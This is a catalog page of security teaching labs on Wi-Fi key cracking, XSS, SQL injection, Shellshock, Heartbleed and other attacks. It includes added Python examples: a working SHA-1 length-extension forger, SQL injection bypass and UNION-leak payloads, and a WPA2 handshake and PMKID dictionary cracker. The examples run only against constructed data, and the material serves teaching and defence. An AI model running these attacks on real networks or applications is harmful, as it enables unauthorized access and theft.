

All Labs

WEP Cracking via Passive Listening

The purpose of this lab is to understand and exploit the security vulnerabilities of an 802.11 WEP-secured network. You will passively collect enough WEP IVs (initialization vectors) to recover the WEP encryption key. After obtaining the key, you will masquerade as a legitimate WEP client on the network, access a server, and download a file.

Fundamental

mobile

WEP Cracking via Active Injection

The purpose of this lab is to continue exploring the vulnerabilities of the 802.11 WEP security protocol, which is well known to be crippled by numerous security flaws. In the WEP Cracking via Passive Listening lab in the Eureka series, we exploited these flaws when a large amount of traffic was available to listen to. However, a network in regular use rarely carries enough traffic to supply the IVs a passive attack needs, which makes the relatively easy crack from that lab considerably more difficult. In this lab, we use more efficient techniques, actively injecting frames so that the access point itself generates the traffic we need, to continue exploiting the WEP protocol.

Fundamental

mobile

WPA-PSK Key Cracking via Handshake Capture

The first generation of the IEEE 802.11 security standard, Wired Equivalent Privacy (WEP), was found to be vulnerable to various statistical weaknesses in its encryption algorithm. While attempts were made to correct the problem, it is still relatively simple to crack WEP and essentially pull the password right out of thin air. As a result, the Wi-Fi Alliance created an interim standard called Wi-Fi Protected Access (WPA). However, the WPA Pre-Shared Key (PSK) mode is crackable because of how its authentication procedure is used in practice: there is a human-friendly passphrase and a user who chose it, and since most users select poor passphrases, there is an opportunity to exploit. The TKIP per-packet keys are not what this attack targets; instead, the initial key establishment that happens during client authentication provides the opportunity to recover the passphrase. An effective way to crack WPA-PSK is to force a legitimate client to re-authenticate. By forcing an actively connected client to disconnect and reconnect, we can capture the four-way handshake in which the client and access point prove possession of the pre-shared key, and that capture can then be checked offline against candidate passphrases. A good dictionary attack will take care of a lot of simple passphrases. Consequently, when the passphrase is weak it is potentially easier to crack WPA-PSK than to crack WEP, as we will discover in this lab.

Fundamental

mobile

"Unlock" Wi-Fi Protected Setup (WPS)

Wi-Fi Protected Setup, or WPS, is a simplified way to join a WPA2-Personal network, either by pushing a button on the router or by entering a short PIN printed on it. Have you ever been connecting to a network and seen an option underneath the "Password" field that said "Or push the button on the router to connect"? That is WPS at work. The push-button method relies mainly on physical security, the idea that a potential attacker needs to be physically present to compromise the system. However, this lab will demonstrate how a remote WPS attack is still possible.

Advanced

mobile

Secure your WiFi with WPA2-Enterprise

The purpose of this lab is to set up a WPA/WPA2 Enterprise (TKIP/AES with EAP-TTLS/PEAP) wireless network, using FreeRADIUS as the authentication server and an OpenWrt router as the access point. In addition, you will configure Linux, Windows, and Android clients to connect to the network.

Advanced

mobile

Mobile Lab Platform for Users (Updated)

In this document, we first introduce how to create a user lab platform for the activities in our Eureka labs. Next, we practice a few important wireless-related commands. Lastly, we perform a rudimentary wireless network survey with these tools and commands.

Fundamental

mobile

"Hide-and-Seek" in Wireless

In this basic lab, we will set up a simple wireless network with SSID hiding enabled. Students will be tasked to play wireless "hide-and-seek" (a simple wireless penetration test): locating and identifying a network whose SSID is not broadcast.

Fundamental

mobile

Mischievous MAC?

Carrier Sense Multiple Access (CSMA) is a probabilistic media access control (MAC) protocol in which a node verifies the absence of other traffic before transmitting on a shared medium. CSMA/CA (Collision Avoidance) is the variant used for carrier transmission in 802.11 networks. In this lab, we will observe how CSMA/CA regulates access to the channel. With this knowledge, we can detect abuses and misbehavior targeted at CSMA/CA at the MAC layer.

Challenging

mobile

Evil Twin AP Attacks and Prevention

An evil twin is a malicious access point set up to copy the identity (SSID, and often the BSSID) of a real access point, hence the name twin, in order to eavesdrop and steal sensitive information. The attack tricks unsuspecting users into connecting to it, and from there the attacker can mount many other attacks, such as man-in-the-middle interception or phishing websites.

Advanced

mobile network

Passing on Passwords

When passwords are compromised, they can lead to unauthorized data access, putting users at risk.

Fundamental

network system

XSS Attack and Defense

Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites, so that they run in victims' browsers within the trusted site's origin.

Fundamental

network

Take My Coin!

A blockchain is a growing list of records, called blocks, that are linked using cryptography. Each block contains a cryptographic hash of the previous block, a timestamp, and transaction data, so altering any block changes its hash and breaks the link from every block after it. In this lab, we will practice coin mining and block creation.

Fundamental

network
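The following is an added example written for this page, not the lab's own code: a toy proof-of-work chain that mines blocks containing the three fields named above (previous hash, timestamp, transaction data), links them, and shows that editing a mined block is detected when the chain is re-validated. The transactions, timestamps and difficulty are constructed sample values.

```python
import hashlib
import json

DIFFICULTY = 3  # leading hex zeros required of a block hash (toy setting, not a real network's)


def block_hash(block):
    """Hash the block header: index, previous hash, timestamp, transactions, nonce.
    The 'hash' field itself is excluded because it is the output of this function."""
    header = {k: block[k] for k in ("index", "prev_hash", "timestamp", "transactions", "nonce")}
    return hashlib.sha256(json.dumps(header, sort_keys=True).encode()).hexdigest()


def mine(block, difficulty=DIFFICULTY):
    """Proof of work: increment the nonce until the block hash meets the difficulty target."""
    block["nonce"] = 0
    while True:
        h = block_hash(block)
        if h.startswith("0" * difficulty):
            block["hash"] = h
            return block
        block["nonce"] += 1


def build_chain(tx_batches, difficulty=DIFFICULTY):
    """Mine a genesis block, then one block per batch of transactions, each linked to its
    predecessor through prev_hash. Timestamps are fixed constants so the run is deterministic."""
    genesis = {"index": 0, "prev_hash": "0" * 64, "timestamp": 1700000000,
               "transactions": [], "nonce": 0}
    chain = [mine(genesis, difficulty)]
    for i, txs in enumerate(tx_batches, start=1):
        block = {"index": i, "prev_hash": chain[-1]["hash"], "timestamp": 1700000000 + 600 * i,
                 "transactions": txs, "nonce": 0}
        chain.append(mine(block, difficulty))
    return chain


def validate_chain(chain, difficulty=DIFFICULTY):
    """Re-derive every hash and check every link. An edited block fails because its stored
    hash no longer matches (and the next block's prev_hash no longer points at it)."""
    for i, block in enumerate(chain):
        if block["hash"] != block_hash(block) or not block["hash"].startswith("0" * difficulty):
            return False
        if i > 0 and block["prev_hash"] != chain[i - 1]["hash"]:
            return False
    return True


def demo():
    """Mine a two-block chain from constructed transactions, then tamper with block 1."""
    chain = build_chain([[{"from": "alice", "to": "bob", "amount": 5}],
                         [{"from": "bob", "to": "carol", "amount": 2}]])
    before = validate_chain(chain)
    chain[1]["transactions"][0]["amount"] = 500  # rewrite history in an already-mined block
    after = validate_chain(chain)
    return before, after


if __name__ == "__main__":
    print(demo())  # expected: (True, False)
```

Re-mining the tampered block would repair its own hash, but not the prev_hash stored in every later block, which is why an attacker must redo the proof of work for the rest of the chain.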

Identity Demystified

In cryptography, a public key certificate, also known as a digital certificate or identity certificate, is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner (called the subject), and the digital signature of an entity that has verified the certificate's contents (called the issuer). If the signature is valid and the software examining the certificate trusts the issuer, it can use that key to communicate securely with the certificate's subject.

Advanced

network

Crypto Flickered!

Length extension attacks cause serious vulnerabilities when people mistakenly try to construct something like an HMAC by computing hash(secret || message). Many hash functions, including MD5, SHA-1 and SHA-256, are subject to length extension. Such hash functions are built around a compression function and maintain an internal state, which is initialized to a fixed constant. Messages are processed in fixed-size blocks by applying the compression function to the current state and the current block to compute an updated internal state. The result of the final application of the compression function becomes the output of the hash function. A consequence of this design is that if we know the hash of an n-block message, we can compute the hash of longer messages (the original message, its padding, and anything we append) by applying the compression function for each block that we want to add, without knowing the content of the original message. This process is called length extension, and it can be used to attack many applications of hash functions: an attacker who knows hash(secret || message) and the length of the secret can forge a valid tag for message || padding || extension. HMAC is the construction that avoids this problem.

Advanced

system
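An added example, written for this page rather than taken from the lab, that carries the attack described above through end to end. SHA-1 is written out so that its internal state can be set by the attacker (Python's hashlib does not expose it); MD5 and SHA-256 have the same block structure and are extended the same way. The secret, message and extension are constructed values, and the attacker is assumed to know the secret's length, which in practice is simply brute-forced.

```python
import hashlib
import hmac
import struct

_IV = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0]  # SHA-1 initial state


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def _compress(state, block):
    """One application of the SHA-1 compression function to a 64-byte block."""
    w = list(struct.unpack(">16I", block))
    for i in range(16, 80):
        w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    a, b, c, d, e = state
    for i in range(80):
        if i < 20:
            f, k = (b & c) | (~b & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        a, b, c, d, e = (_rotl(a, 5) + f + e + k + w[i]) & 0xFFFFFFFF, a, _rotl(b, 30), c, d
    return [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d, e))]


def sha1_padding(message_len):
    """The padding SHA-1 appends: 0x80, zeros up to 56 mod 64, then the bit length in 8 bytes."""
    return b"\x80" + b"\x00" * ((55 - message_len) % 64) + struct.pack(">Q", message_len * 8)


def sha1_from_state(state, data, total_len):
    """Absorb `data` starting from `state`; `total_len` is the length of everything hashed so far,
    `data` included. With state=_IV and total_len=len(data) this is ordinary SHA-1."""
    data = data + sha1_padding(total_len)
    for i in range(0, len(data), 64):
        state = _compress(state, data[i:i + 64])
    return b"".join(struct.pack(">I", v) for v in state)


def naive_tag(secret, message):
    """The flawed construction from the lab text: hash(secret || message)."""
    return hashlib.sha1(secret + message).hexdigest()


def extend(tag_hex, secret_len, message, extension):
    """Length extension: from the tag of secret||message and only len(secret), forge the tag of
    secret || message || padding || extension without ever learning the secret."""
    state = list(struct.unpack(">5I", bytes.fromhex(tag_hex)))  # the digest is the final state
    glue = sha1_padding(secret_len + len(message))              # the padding the victim applied
    forged_message = message + glue + extension
    total_len = secret_len + len(forged_message)
    forged_tag = sha1_from_state(state, extension, total_len).hex()
    return forged_message, forged_tag


def demo():
    """Returns (naive scheme accepts the forgery, HMAC accepts the forgery)."""
    secret = b"server-side-secret-key"            # constructed; never visible to the attacker
    message = b"user=alice&role=user"
    tag = naive_tag(secret, message)             # what the attacker observes on the wire
    forged_message, forged_tag = extend(tag, len(secret), message, b"&role=admin")
    naive_accepts = naive_tag(secret, forged_message) == forged_tag
    # HMAC keys the hash in a way that does not expose the final state, so the forgery fails.
    hmac_accepts = hmac.new(secret, forged_message, hashlib.sha1).hexdigest() == forged_tag
    return naive_accepts, hmac_accepts


if __name__ == "__main__":
    print(demo())  # expected: (True, False)
```

The forged message carries the glue padding bytes in the middle; whether a real application accepts it depends on how it parses the message, which is why the `&role=admin` style of key-value extension is the classic target.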

Bleeding Heart

The Heartbleed bug was a serious vulnerability in OpenSSL's implementation of the TLS heartbeat extension. The weakness allowed attackers to read the memory of systems running the vulnerable versions of OpenSSL, and so to steal information that would normally be protected by the SSL/TLS encryption used to secure connections: the secret keys used to identify service providers and to encrypt traffic, the names and passwords of users, and the actual content.

Advanced

network system

Not-so-Personal Data

This document serves as an experiment guide for using Generative Adversarial Networks (GANs) in privacy attacks and privacy protection.

Challenging

network

"Invisible" Surfing

We all need safe access to the Internet to obtain information and communicate with friends free from technology-facilitated violent offenses such as cyberstalking and harassment. The learning objective of this lab is for students to become aware of personally identifiable information (PII) and how it leaks while browsing. Students will experiment with technologies such as Virtual Private Networks (VPNs) that protect identity information via encryption.

Advanced

network system

Shell Shattered

Shellshock is a security bug in the Unix Bash shell that could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests. The bug causes Bash to unintentionally execute commands that are appended to function definitions stored in the values of environment variables, which it parses when it starts.

Fundamental

system

A “Leaky” Database

SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. SQL injection must exploit a security vulnerability in an application's software, for example when user input is incorrectly filtered for string-literal escape characters embedded in SQL statements, or when user input is not strongly typed and is unexpectedly executed as part of the query. SQL injection is mostly known as an attack vector for websites, but it can be used to attack any application that builds queries for a SQL database.

Advanced

system
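An added example, written for this page rather than taken from the lab, showing the two forms of the flaw described above side by side: a login query built by string formatting, which an attacker can bend both to bypass authentication and to leak another column, and the parameterized form that treats the same input as data. The users table, its contents and the attacker strings are constructed; a real application would not store plaintext passwords.

```python
import sqlite3


def make_db():
    """In-memory SQLite database with a constructed users table (plaintext passwords, demo only)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, is_admin INTEGER);
        INSERT INTO users VALUES (1, 'alice', 'alice-pw', 0);
        INSERT INTO users VALUES (2, 'admin', 's3cr3t-admin-pw', 1);
    """)
    return conn


def login_vulnerable(conn, username, password):
    """User input is pasted into the SQL text, so a quote in the input rewrites the statement."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized query: the driver binds the input as values, never parses it as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Constructed attacker inputs.
BYPASS = "admin'--"   # closes the string and comments out the password check
LEAK = "' UNION SELECT password FROM users WHERE username = 'admin'--"   # pulls another column


def demo():
    """Run both attacker strings against both implementations, plus a legitimate login."""
    conn = make_db()
    return {
        "vulnerable_bypass": login_vulnerable(conn, BYPASS, "wrong"),   # -> 'admin'
        "vulnerable_leak": login_vulnerable(conn, LEAK, "wrong"),       # -> admin's password
        "safe_bypass": login_safe(conn, BYPASS, "wrong"),               # -> None
        "safe_leak": login_safe(conn, LEAK, "wrong"),                   # -> None
        "safe_legit": login_safe(conn, "admin", "s3cr3t-admin-pw"),     # -> 'admin'
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "=>", v)
```

The UNION payload is the "leaky" case: the injected second SELECT has its own WHERE clause, so the application's password check never applies to the rows it returns.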

This POODLE Bites!

The Padding Oracle On Downgraded Legacy Encryption (POODLE) attack, also known as CVE-2014-3566, is an exploit used to steal information from secure connections, including cookies, passwords and any other browser data that is encrypted by the Secure Sockets Layer (SSL) protocol. It forces a client and server to fall back to the legacy SSL 3.0 protocol and then uses SSL 3.0's weak check of CBC padding as a padding oracle, allowing attackers to decrypt network traffic between a client and a server one byte at a time.

Challenging

network system

Intruder Hunt

An intrusion detection system (IDS) is a device or software application that monitors a network or systems for malicious activity or policy violations. Any detected intrusion or violation is typically reported to an administrator or collected centrally by a security information and event management (SIEM) system.

Advanced

network system

Walls Have Ears

The purpose of this lab is to inspire interest in mobile security by demonstrating the possibility of wireless tapping. We will explore some security vulnerabilities associated with wireless-based VoIP services. For example, because wireless communication is open to anyone in range, a third party may be able to intercept a phone conversation and replay it.

Fundamental

mobile

Video Aficionado

The purpose of this lab is to understand and exploit the vulnerabilities of "open-access" mobile data for privacy breaches. Typically, mobile devices such as smartphones have a set of rigorous access control mechanisms (e.g., formal permission requests to access personal information) to protect private or otherwise sensitive user data. As a result, these mechanisms prevent a third party (e.g., an app) from directly reading private user information. However, not all mobile data is protected; for example, the power consumption of a mobile device is considered non-sensitive and is readable by any app. Consequently, it is possible to infer private information from open-access data that is available to all apps.

Challenging

mobile

"Pixie and Dixie vs. Mr. AI": One-Pixel Attack

The purpose of this lab is to understand and exploit vulnerabilities of deep neural networks used in the Internet of Things (IoT). Image data and a trained deep neural network model are typically used to classify an image (e.g., facial recognition for authentication) on mobile and/or IoT devices. In this lab, you will be prompted to pinpoint a vulnerable pixel such that changing this single pixel results in a wrong classification, which may confuse the security modules that rely on the prediction.

Advanced

mobile

WPA3-SAE: A Dragonfly Aims to Fix Wi-Fi’s Wings

In January 2018, WPA3 was announced as the replacement for WPA2. The WPA3 standard replaces the pre-shared key (PSK) exchange with Simultaneous Authentication of Equals (SAE), as defined in IEEE 802.11-2016, resulting in a more secure initial key exchange in personal mode. It is also claimed that WPA3 mitigates the security issues posed by weak passwords and simplifies the process of setting up devices with no display interface. However, just one year after the launch of WPA3, researchers unveiled several serious vulnerabilities in the protocol that could allow attackers to recover the password of the Wi-Fi network.

Advanced

mobile

Same, Same But Encrypted: An Enhanced Open Wi-Fi Network

Wi-Fi "Enhanced Open" is a new security standard for public networks based on Opportunistic Wireless Encryption (OWE). It provides encryption and privacy on open, non-password-protected networks in places such as cafes, hotels, restaurants, and libraries: each client and the access point run an unauthenticated Diffie-Hellman exchange to derive a per-client key, so other users of the same open network cannot passively read its traffic. WPA3 and Wi-Fi Enhanced Open improve overall Wi-Fi security, providing better privacy and robustness against some known attacks.

Advanced

mobile

WPA-PSK Key Cracking with Pairwise Master Key Identifier

In our Eureka Labs series, we have a lab that cracks the WPA-PSK key by tricking a legitimate client into re-transmitting the EAPOL four-way handshake frames. In this attack lab, by contrast, capturing a full EAPOL four-way handshake is not required. The attack uses the PMKID carried in the RSN IE (Robust Security Network Information Element) of a single EAPOL frame, the first handshake message sent by the access point, so no connected client needs to be present or deauthenticated.

Advanced

mobile
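An added example that serves both the handshake-capture lab (WPA-PSK Key Cracking via Handshake Capture) and this PMKID lab; it is written for this page and is not the labs' own material. It walks the WPA2-PSK key schedule from passphrase to PMK, PTK/KCK, handshake MIC and PMKID, then runs the two offline dictionary attacks against a simulated capture, showing why the PMKID route needs neither nonces nor a client. The SSID, MAC addresses, nonces, the EAPOL frame and the wordlist are constructed stand-ins for what a real capture would supply.

```python
import hashlib
import hmac

# Constructed capture parameters (not a real network): values an attacker reads from the frames.
SSID = "EurekaLab"
AP_MAC = bytes.fromhex("020000000001")    # AA, the authenticator (access point) address
STA_MAC = bytes.fromhex("020000000002")   # SPA, the supplicant (client) address
ANONCE = bytes(range(32))                 # AP nonce from message 1
SNONCE = bytes(range(32, 64))             # client nonce from message 2
# Message 2 as fed to the MIC check: the whole EAPOL frame with its 16-byte MIC field zeroed.
# Constructed layout loosely following an EAPOL-Key frame; the exact bytes do not matter here.
EAPOL_MSG2 = (b"\x01\x03\x00\x75"                 # 802.1X header: version, type=EAPOL-Key, length
              + b"\x02\x01\x0a\x00\x00"           # descriptor type, key info, key length
              + b"\x00" * 7 + b"\x01"             # replay counter
              + SNONCE                            # client nonce
              + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # key IV, RSC, reserved
              + b"\x00" * 16                      # MIC field, zeroed when computing/verifying
              + b"\x00\x16" + b"\x30\x14" + b"\x00" * 20)  # key data length, placeholder RSN IE


def pmk_from_passphrase(passphrase, ssid):
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key, label, data):
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, concatenated."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_kck(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces));
    its first 16 bytes are the KCK, the key that authenticates the handshake messages."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck, eapol_frame_mic_zeroed):
    """WPA2/CCMP MIC: first 16 bytes of HMAC-SHA1 over the EAPOL frame (WPA/TKIP uses HMAC-MD5)."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def pmkid(pmk, ap_mac, sta_mac):
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA), sent by the AP in the RSN IE of message 1."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def simulate_capture(passphrase):
    """What the AP and client put on the air for this passphrase; the attacker sees only these."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    kck = derive_kck(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)
    return {"mic": eapol_mic(kck, EAPOL_MSG2), "pmkid": pmkid(pmk, AP_MAC, STA_MAC)}


def crack_handshake(capture, wordlist):
    """Offline dictionary attack on the four-way handshake MIC (needs a client to deauthenticate)."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, SSID)
        kck = derive_kck(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)
        if hmac.compare_digest(eapol_mic(kck, EAPOL_MSG2), capture["mic"]):
            return candidate
    return None


def crack_pmkid(capture, wordlist):
    """Offline dictionary attack on the PMKID: only the PMK is checked, so no nonces, no MIC and
    no connected client are needed; a single message 1 from the AP is enough."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, SSID)
        if hmac.compare_digest(pmkid(pmk, AP_MAC, STA_MAC), capture["pmkid"]):
            return candidate
    return None


WORDLIST = ["password", "12345678", "letmein!", "summer2019", "correcthorse"]  # constructed


if __name__ == "__main__":
    cap = simulate_capture("summer2019")
    print("handshake:", crack_handshake(cap, WORDLIST))   # expected: summer2019
    print("pmkid:", crack_pmkid(cap, WORDLIST))           # expected: summer2019
```

Both attacks pay the same cost per guess, one PBKDF2 run of 4096 SHA-1 iterations, which is the only thing standing between a captured network and its passphrase; the PMKID variant just removes the need to wait for, or force, a client handshake.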